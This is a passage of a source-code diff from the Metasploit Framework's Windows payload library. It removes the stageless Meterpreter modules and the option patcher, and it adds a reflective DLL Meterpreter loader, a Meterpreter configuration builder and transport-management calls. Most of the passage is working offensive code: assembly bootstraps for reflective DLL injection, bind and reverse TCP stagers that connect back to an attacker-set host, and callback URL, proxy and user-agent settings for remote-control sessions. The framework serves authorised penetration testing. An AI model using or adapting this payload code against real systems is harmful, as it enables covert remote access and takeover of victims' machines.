def transport_config(opts={})
transport_config_reverse_https(opts)
end
#
# Determine the maximum amount of space required for the features requested
#

121
lib/msf/core/payload/windows/stageless_meterpreter.rb
View File

@ -1,121 +0,0 @@
#-*- coding: binary -*-
require 'msf/core'
require 'rex/payloads/meterpreter/patch'
module Msf
##
#
# Implements stageless invocation of metsrv in x86
#
##
module Payload::Windows::StagelessMeterpreter
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::ReflectiveDLLLoader
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
dec ebp ; 'M'
pop edx ; 'Z'
call $+5 ; call next instruction
pop ebx ; get the current location (+7 bytes)
push edx ; restore edx
inc ebp ; restore ebp
push ebp ; save ebp for later
mov ebp, esp ; set up a new stack frame
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader() (0x????????)
add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
call ebx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; offset from ReflectiveLoader() to the end of the DLL
add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
push ebx ; push the pointer to the extension list
push 4 ; indicate that we have attached
push eax ; push some arbitrary value for hInstance
mov ebx, eax ; save DllMain for another call
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; indicate that we have detached
push eax ; push some arbitrary value for hInstance
call ebx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
asm
end
def generate_stageless_x86(url = nil)
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll'))
conf = {
:rdi_offset => offset,
:length => dll.length,
:exitfunk => datastore['EXITFUNC']
}
asm = asm_invoke_metsrv(conf)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
print_error("Stageless Meterpreter generated with oversized x86 bootstrap.")
return
end
# patch the binary with all the stuff
dll[0, bootstrap.length] = bootstrap
# the URL might not be given, as it might be patched in some other way
if url
# Patch the URL using the patcher as this supports both ASCII and WCHAR.
unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
# If the patching failed this could mean that we are somehow
# working with outdated binaries, so try to patch with the
# old stuff.
Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
end
end
# Patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
# if a block is given then call that with the meterpreter dll
# so that custom patching can happen if required
yield dll if block_given?
# append each extension to the payload, including
# the size of the extension
unless datastore['EXTENSIONS'].nil?
datastore['EXTENSIONS'].split(',').each do |e|
e = e.strip.downcase
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{e}", 'x86.dll'))
# append the size, offset to RDI and the payload itself
dll << [ext.length].pack('V') + ext
end
end
# Terminate the "list" of extensions
dll + [0].pack('V')
end
end
end

51
lib/msf/core/payload/windows/x64/bind_tcp.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/x64/block_api'
require 'msf/core/payload/windows/x64/exitfunk'
@ -14,36 +15,33 @@ module Msf
module Payload::Windows::BindTcp_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi_x64
include Msf::Payload::Windows::Exitfunk_x64
def close_listen_socket
datastore['StagerCloseListenSocket'].nil? || datastore['StagerCloseListenSocket'] == true
end
#
# Generate the first stage
#
def generate
# Generate the simple version of this stager if we don't have enough space
if self.available_space.nil? || required_space > self.available_space
return generate_bind_tcp(
port: datastore['LPORT'],
close_socket: close_listen_socket
)
end
conf = {
port: datastore['LPORT'],
exitfunk: datastore['EXITFUNC'],
close_socket: close_listen_socket,
reliable: true
port: datastore['LPORT'],
reliable: false
}
# Generate the more advanced stager if we have the space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:reliable] = true
end
generate_bind_tcp(conf)
end
def transport_config(opts={})
transport_config_bind_tcp(opts)
end
#
# Generate and compile the stager
#
@ -66,21 +64,17 @@ module Payload::Windows::BindTcp_x64
def required_space
# Start with our cached default generated size
# TODO: need help with this from the likes of HD.
space = 277
space = cached_size
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
# EXITFUNK unset will still call ExitProces, which adds 7 bytes (accounted for above)
# TODO: this is coming soon
# Reliability checks add 4 bytes for the first check, 5 per recv check (2)
#space += 14
# if the payload doesn't need the listen socket closed then we save space. This is
# the case for meterpreter payloads, as metsrv now closes the listen socket once it
# kicks off (needed for more reliable shells).
space -= 11 unless close_listen_socket
# The final estimated size
space
end
@ -94,7 +88,6 @@ module Payload::Windows::BindTcp_x64
#
def asm_bind_tcp(opts={})
reliable = opts[:reliable]
close_socket = opts[:close_socket]
encoded_port = "0x%.16x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
asm = %Q^
@ -150,23 +143,11 @@ module Payload::Windows::BindTcp_x64
mov rcx, rdi ; listening socket
mov r10d, 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
call rbp ; accept( s, 0, 0 );
^
if close_socket
asm << %Q^
; perform the call to closesocket...
mov rcx, rdi ; the listening socket to close
mov rdi, rax ; swap the new connected socket over the listening socket
mov r10d, 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call rbp ; closesocket( s );
^
else
asm << %Q^
mov rdi, rax ; swap the new connected socket over the listening socket
^
end
asm << %Q^
; restore RSP so we dont have any alignment issues with the next block...
add rsp, #{408+8+8*4+32*7} ; cleanup the stack allocations

102
lib/msf/core/payload/windows/x64/meterpreter_loader.rb Normal file
View File

@ -0,0 +1,102 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/reflective_dll_loader'
module Msf
###
#
# Common module stub for ARCH_X86_64 payloads that make use of Meterpreter.
#
###
module Payload::Windows::MeterpreterLoader_x64
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows
def initialize(info = {})
super(update_info(info,
'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf', 'OJ Reeves' ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'PayloadCompat' => { 'Convention' => 'sockrdi' },
'Stage' => { 'Payload' => "" }
))
end
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
^
unless opts[:stageless]
asm << %Q^
; store the comms socket handle
mov dword ptr [rbx], edi
^
end
asm << %Q^
mov r8, rbx ; r8 points to the extension list
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rax ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
^
end
def stage_meterpreter(stageless=false)
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))
asm_opts = {
rdi_offset: offset,
length: dll.length,
stageless: stageless
}
asm = asm_invoke_metsrv(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
dll
end
end
end

85
lib/msf/core/payload/windows/x64/reflectivedllinject.rb
View File

@ -30,10 +30,7 @@ module Payload::Windows::ReflectiveDllInject_x64
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'PayloadCompat' => { 'Convention' => 'sockrdi' },
'Stage' => {
'Offsets' => { 'EXITFUNC' => [ 47, 'V' ] },
'Payload' => ""
}
'Stage' => { 'Payload' => "" }
))
register_options( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class )
@ -43,52 +40,60 @@ module Payload::Windows::ReflectiveDllInject_x64
datastore['DLL']
end
def asm_invoke_dll(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; offset from ReflectiveLoader() to the end of the DLL
mov r8, rdi ; r8 contains the socket
mov rbx, rax ; save DllMain for another call
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; push 5, indicate that we have detached
pop rdx ; pop 5 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
end
def stage_payload
# Exceptions will be thrown by the mixin if there are issues.
dll, offset = load_rdi_dll(library_path)
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration
bootstrap = "\x4D\x5A" + # pop r10 ; pop r10 = 'MZ'
"\x41\x52" + # push r10 ; push r10 back
"\x55" + # push rbp ; save ebp
"\x48\x89\xE5" + # mov rbp, rsp ; setup fresh stack frame
"\x48\x81\xEC\x20\x00\x00\x00" + # sub rsp, 32 ; alloc some space for calls
"\x48\x8D\x1D\xEA\xFF\xFF\xFF" + # lea rbx, [rel+0] ; get virtual address for the start of this stub
"\x48\x81\xC3" + [offset].pack( "V" ) + # add rbx, 0x???????? ; add offset to ReflectiveLoader
"\xFF\xD3" + # call rbx ; call ReflectiveLoader()
"\x48\x89\xC3" + # mov rbx, rax ; save DllMain for second call
"\x49\x89\xF8" + # mov r8, rdi ; R8 = our socket
"\x68\x04\x00\x00\x00" + # push 4 ;
"\x5A" + # pop rdx ; RDX = signal we have attached
"\xFF\xD0" + # call rax ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
"\x41\xB8" + exit_funk + # mov r8d, 0x???????? ; our EXITFUNC placeholder
"\x68\x05\x00\x00\x00" + # push 5 ;
"\x5A" + # pop rdx ; signal we have detached
"\xFF\xD3" # call rbx ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
# the DOS headers e_lfanew entry will begin here at offset 64.
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if( bootstrap.length > 62 )
print_error( "Reflective Dll Injection (x64) generated an oversized bootstrap!" )
return
end
# patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i,
asm_opts = {
rdi_offset: offset,
exitfunk: 'thread' # default to 'thread' for migration
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
asm = asm_invoke_dll(asm_opts)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!"
end
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
# return our stage to be loaded by the intermediate stager
return dll
dll
end
end

32
lib/msf/core/payload/windows/x64/reverse_tcp.rb
View File

@ -1,6 +1,7 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/x64/block_api'
require 'msf/core/payload/windows/x64/exitfunk'
@ -14,6 +15,7 @@ module Msf
module Payload::Windows::ReverseTcp_x64
include Msf::Payload::TransportConfig
include Msf::Payload::Windows
include Msf::Payload::Windows::BlockApi_x64
include Msf::Payload::Windows::Exitfunk_x64
@ -29,24 +31,19 @@ module Payload::Windows::ReverseTcp_x64
# Generate the first stage
#
def generate
# TODO: coming later
# Generate the simple version of this stager if we don't have enough space
#if self.available_space.nil? || required_space > self.available_space
# return generate_reverse_tcp(
# port: datastore['LPORT'],
# host: datastore['LHOST'],
# retry_count: datastore['ReverseConnectRetries'],
# )
#end
conf = {
host: datastore['LHOST'],
port: datastore['LPORT'],
host: datastore['LHOST'],
retry_count: datastore['ReverseConnectRetries'],
exitfunk: datastore['EXITFUNC'],
reliable: true
reliable: false
}
# Generate the advanced stager if we have space
unless self.available_space.nil? || required_space > self.available_space
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end
generate_reverse_tcp(conf)
end
@ -66,6 +63,10 @@ module Payload::Windows::ReverseTcp_x64
Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
end
def transport_config(opts={})
transport_config_reverse_tcp(opts)
end
#
# Determine the maximum amount of space required for the features requested
#
@ -92,8 +93,9 @@ module Payload::Windows::ReverseTcp_x64
#
def asm_reverse_tcp(opts={})
#retry_count = [opts[:retry_count].to_i, 1].max
# TODO: reliable = opts[:reliable]
# TODO: reliability coming later
reliable = opts[:reliable]
retry_count = [opts[:retry_count].to_i, 1].max
encoded_port = [opts[:port].to_i,2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]

121
lib/msf/core/payload/windows/x64/stageless_meterpreter.rb
View File

@ -1,121 +0,0 @@
#-*- coding: binary -*-
require 'msf/core'
require 'rex/payloads/meterpreter/patch'
module Msf
##
#
# Implements stageless invocation of metsrv in x64
#
##
module Payload::Windows::StagelessMeterpreter_x64
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::ReflectiveDLLLoader
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
mov r8, rbx ; r8 points to the extension list
mov rbx, rax ; save DllMain for another call
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket)
; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
; push the exitfunk value onto the stack
mov r8d, #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]}
push 5 ; push 5, indicate that we have detached
pop rdx ; pop 5 into rdx
call rbx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk)
^
asm
end
def generate_stageless_x64(url = nil)
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll'))
conf = {
:rdi_offset => offset,
:length => dll.length,
:exitfunk => datastore['EXITFUNC']
}
asm = asm_invoke_metsrv(conf)
# generate the bootstrap asm
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
# sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
if bootstrap.length > 62
print_error("Stageless Meterpreter generated with oversized x64 bootstrap.")
return
end
# patch the binary with all the stuff
dll[0, bootstrap.length] = bootstrap
# the URL might not be given, as it might be patched in some other way
if url
# Patch the URL using the patcher as this supports both ASCII and WCHAR.
unless Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 512}", "s#{url}\x00")
# If the patching failed this could mean that we are somehow
# working with outdated binaries, so try to patch with the
# old stuff.
Rex::Payloads::Meterpreter::Patch.patch_string!(dll, "https://#{'X' * 256}", "s#{url}\x00")
end
end
# Patch in the timeout options
timeout_opts = {
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i
}
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(dll, timeout_opts)
# if a block is given then call that with the meterpreter dll
# so that custom patching can happen if required
yield dll if block_given?
# append each extension to the payload, including
# the size of the extension
unless datastore['EXTENSIONS'].nil?
datastore['EXTENSIONS'].split(',').each do |e|
e = e.strip.downcase
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{e}", 'x64.dll'))
# append the size, offset to RDI and the payload itself
dll << [ext.length].pack('V') + ext
end
end
# Terminate the "list" of extensions
dll + [0].pack('V')
end
end
end

1
lib/rex/payloads.rb
View File

@ -1,3 +1,2 @@
# -*- coding: binary -*-
require 'rex/payloads/win32'
require 'rex/payloads/meterpreter'

2
lib/rex/payloads/meterpreter.rb
View File

@ -1,2 +0,0 @@
# -*- coding: binary -*-
require 'rex/payloads/meterpreter/patch'

155
lib/rex/payloads/meterpreter/config.rb Normal file
View File

@ -0,0 +1,155 @@
# -*- coding: binary -*-
require 'msf/core/payload/uuid'
require 'msf/core/payload/windows'
require 'msf/core/reflective_dll_loader'
require 'rex/parser/x509_certificate'
class Rex::Payloads::Meterpreter::Config
include Msf::ReflectiveDLLLoader
UUID_SIZE = 64
URL_SIZE = 512
UA_SIZE = 256
PROXY_HOST_SIZE = 128
PROXY_USER_SIZE = 64
PROXY_PASS_SIZE = 64
CERT_HASH_SIZE = 20
def initialize(opts={})
@opts = opts
if opts[:ascii_str] && opts[:ascii_str] == true
@to_str = self.method(:to_ascii)
else
@to_str = self.method(:to_wchar_t)
end
end
def to_b
config_block
end
private
def is_x86?
@opts[:arch] == ARCH_X86
end
def to_str(item, size)
@to_str.call(item, size)
end
def to_wchar_t(item, size)
to_ascii(item, size).unpack("C*").pack("v*")
end
def to_ascii(item, size)
item.to_s.ljust(size, "\x00")
end
def session_block(opts)
uuid = to_str(opts[:uuid].to_raw, UUID_SIZE)
exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]]
session_data = [
0, # comms socket, patched in by the stager
exit_func, # exit function identifer
opts[:expiration], # Session expiry
uuid # the UUID
]
session_data.pack("VVVA*")
end
def transport_block(opts)
# Build the URL from the given parameters, and pad it out to the
# correct size
lhost = opts[:lhost]
if lhost && opts[:scheme].start_with?('http') && Rex::Socket.is_ipv6?(lhost)
lhost = "[#{lhost}]"
end
url = "#{opts[:scheme]}://#{lhost}:#{opts[:lport]}"
url << "#{opts[:uri]}/" if opts[:uri]
url << "?#{opts[:scope_id]}" if opts[:scope_id]
# if the transport URI is for a HTTP payload we need to add a stack
# of other stuff
pack = 'A*VVV'
transport_data = [
to_str(url, URL_SIZE), # transport URL
opts[:comm_timeout], # communications timeout
opts[:retry_total], # retry total time
opts[:retry_wait] # retry wait time
]
if url.start_with?('http')
proxy_host = ''
if opts[:proxy_host] && opts[:proxy_port]
prefix = 'http://'
prefix = 'socks=' if opts[:proxy_type].downcase == 'socks'
proxy_host = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
end
proxy_host = to_str(proxy_host || '', PROXY_HOST_SIZE)
proxy_user = to_str(opts[:proxy_user] || '', PROXY_USER_SIZE)
proxy_pass = to_str(opts[:proxy_pass] || '', PROXY_PASS_SIZE)
ua = to_str(opts[:ua] || '', UA_SIZE)
cert_hash = "\x00" * CERT_HASH_SIZE
cert_hash = opts[:ssl_cert_hash] if opts[:ssl_cert_hash]
# add the HTTP specific stuff
transport_data << proxy_host # Proxy host name
transport_data << proxy_user # Proxy user name
transport_data << proxy_pass # Proxy password
transport_data << ua # HTTP user agent
transport_data << cert_hash # SSL cert hash for verification
# update the packing spec
pack << 'A*A*A*A*A*'
end
# return the packed transport information
transport_data.pack(pack)
end
def extension_block(ext_name, file_extension)
ext_name = ext_name.strip.downcase
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
file_extension))
extension_data = [ ext.length, ext ].pack("VA*")
end
def config_block
# start with the session information
config = session_block(@opts)
# then load up the transport configurations
(@opts[:transports] || []).each do |t|
config << transport_block(t)
end
# terminate the transports with NULL (wchar)
config << "\x00\x00"
# configure the extensions - this will have to change when posix comes
# into play.
file_extension = 'x86.dll'
file_extension = 'x64.dll' unless is_x86?
(@opts[:extensions] || []).each do |e|
config << extension_block(e, file_extension)
end
# terminate the extensions with a 0 size
if is_x86?
config << [0].pack("V")
else
config << [0].pack("Q")
end
# and we're done
config
end
end

166
lib/rex/payloads/meterpreter/patch.rb
View File

@ -1,166 +0,0 @@
# -*- coding: binary -*-
module Rex
module Payloads
module Meterpreter
###
#
# Provides methods to patch options into metsrv stagers
#
###
module Patch
#
# Replace the transport string
#
def self.patch_transport!(blob, ssl)
str = ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
patch_string!(blob, "METERPRETER_TRANSPORT_SSL", str)
end
#
# Replace the URL
#
def self.patch_url!(blob, url)
unless patch_string!(blob, "https://#{'X' * 512}", url)
# If the patching failed this could mean that we are somehow
# working with outdated binaries, so try to patch with the
# old stuff.
patch_string!(blob, "https://#{'X' * 256}", url)
end
end
#
# Replace the timeout data with the actual timeout values.
#
def self.patch_timeouts!(blob, opts)
i = blob.index("METERP_TIMEOUTS\x00")
if i
data = [opts[:expiration].to_i, opts[:comm_timeout].to_i,
opts[:retry_total].to_i, opts[:retry_wait].to_i].pack("VVVV")
blob[i, data.length] = data
end
end
#
# Replace the user agent string with our option
#
def self.patch_ua!(blob, ua)
patch_string!(blob, "METERPRETER_UA\x00", ua[0,255] + "\x00")
end
#
# Activate a custom proxy
#
def self.patch_proxy!(blob, proxyhost, proxyport, proxy_type)
if proxyhost && proxyhost.to_s != ""
proxyhost = proxyhost.to_s
proxyport = proxyport.to_s || "8080"
proxyinfo = proxyhost + ":" + proxyport
if proxyport == "80"
proxyinfo = proxyhost
end
if proxy_type.to_s.upcase == 'HTTP'
proxyinfo = 'http://' + proxyinfo
else #socks
proxyinfo = 'socks=' + proxyinfo
end
proxyinfo << "\x00"
patch_string!(blob, "METERPRETER_PROXY#{"\x00" * 10}", proxyinfo)
end
end
#
# Proxy authentification
#
def self.patch_proxy_auth!(blob, proxy_username, proxy_password, proxy_type)
return if proxy_type.nil? || proxy_type.upcase == 'SOCKS'
if proxy_username && !proxy_username.empty?
unless patch_string!(blob, "METERPRETER_USERNAME_PROXY#{"\x00" * 10}",
proxy_username + "\x00")
raise ArgumentError, "Unable to patch Proxy Username"
end
end
if proxy_password && !proxy_password.empty?
unless patch_string!(blob, "METERPRETER_PASSWORD_PROXY#{"\x00" * 10}",
proxy_password + "\x00")
raise ArgumentError, "Unable to patch Proxy Password"
end
end
end
#
# Patch the ssl cert hash
#
def self.patch_ssl_check!(blob, ssl_cert_hash)
# SSL cert location is an ASCII string, so no need for
# WCHAR support
if ssl_cert_hash
i = blob.index("METERPRETER_SSL_CERT_HASH\x00")
if i
blob[i, ssl_cert_hash.length] = ssl_cert_hash
end
end
end
#
# Patch options into metsrv for reverse HTTP payloads
#
def self.patch_passive_service!(blob, opts)
patch_transport!(blob, opts[:ssl])
patch_url!(blob, opts[:url])
patch_timeouts!(blob, opts)
patch_ua!(blob, opts[:ua])
patch_ssl_check!(blob, opts[:ssl_cert_hash])
patch_proxy!(blob,
opts[:proxy_host],
opts[:proxy_port],
opts[:proxy_type]
)
patch_proxy_auth!(blob,
opts[:proxy_user],
opts[:proxy_pass],
opts[:proxy_type]
)
end
#
# Patch an ASCII value in the given payload. If not found, try WCHAR instead.
#
def self.patch_string!(blob, search, replacement)
result = false
i = blob.index(search)
if i
blob[i, replacement.length] = replacement
result = true
else
i = blob.index(wchar(search))
if i
r = wchar(replacement)
blob[i, r.length] = r
result = true
end
end
result
end
private
#
# Convert the given ASCII string into a WCHAR string (dumb, but works)
#
def self.wchar(str)
str.to_s.unpack("C*").pack("v*")
end
end
end
end
end

256
lib/rex/post/meterpreter/client_core.rb
View File

@ -8,9 +8,6 @@ require 'rex/post/meterpreter/client'
# argument for moving the meterpreter client into the Msf namespace.
require 'msf/core/payload/windows'
# Provides methods to patch options into the metsrv stager.
require 'rex/payloads/meterpreter/patch'
# URI uuid and checksum stuff
require 'msf/core/payload/uuid'
require 'rex/payloads/meterpreter/uri_checksum'
@ -100,6 +97,32 @@ class ClientCore < Extension
commands
end
def transport_list
request = Packet.create_request('core_transport_list')
response = client.send_request(request)
result = {
:session_exp => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
:transports => []
}
response.each(TLV_TYPE_TRANS_GROUP) { |t|
result[:transports] << {
:url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
:comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
:retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
:retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
:ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
:proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
:proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
:proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
:cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
}
}
result
end
def set_transport_timeouts(opts={})
request = Packet.create_request('core_transport_set_timeouts')
@ -273,6 +296,18 @@ class ClientCore < Extension
return true
end
def uuid(timeout=nil)
request = Packet.create_request('core_uuid')
args = [ request ]
args << timeout if timeout
response = client.send_request(*args)
id = response.get_tlv_value(TLV_TYPE_UUID)
return Msf::Payload::UUID.new({:raw => id})
end
def machine_id(timeout=nil)
request = Packet.create_request('core_machine_id')
@ -285,83 +320,34 @@ class ClientCore < Extension
return Rex::Text.md5(mid)
end
def transport_add(opts={})
request = transport_prepare_request('core_transport_add', opts)
return false unless request
client.send_request(request)
return true
end
def transport_change(opts={})
request = transport_prepare_request('core_transport_change', opts)
unless valid_transport?(opts[:transport]) && opts[:lport]
return false
end
return false unless request
if opts[:transport].starts_with?('reverse')
return false unless opts[:lhost]
else
# Bind shouldn't have lhost set
opts[:lhost] = nil
end
client.send_request(request)
transport = VALID_TRANSPORTS[opts[:transport]]
return true
end
request = Packet.create_request('core_transport_change')
scheme = opts[:transport].split('_')[1]
url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
if opts[:comm_timeout]
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
end
if opts[:session_exp]
request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
end
if opts[:retry_total]
request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
end
if opts[:retry_wait]
request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
end
# do more magic work for http(s) payloads
unless opts[:transport].ends_with?('tcp')
sum = uri_checksum_lookup(:connect)
uuid = client.payload_uuid
unless uuid
arch, plat = client.platform.split('/')
uuid = Msf::Payload::UUID.new({
arch: arch,
platform: plat.starts_with?('win') ? 'windows' : plat
})
end
url << generate_uri_uuid(sum, uuid) + '/'
# TODO: randomise if not specified?
opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
hash = Rex::Parser::X509Certificate.get_cert_file_hash(opts[:cert])
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
end
if opts[:proxy_host] && opts[:proxy_port]
prefix = 'http://'
prefix = 'socks=' if opts[:proxy_type] == 'socks'
proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
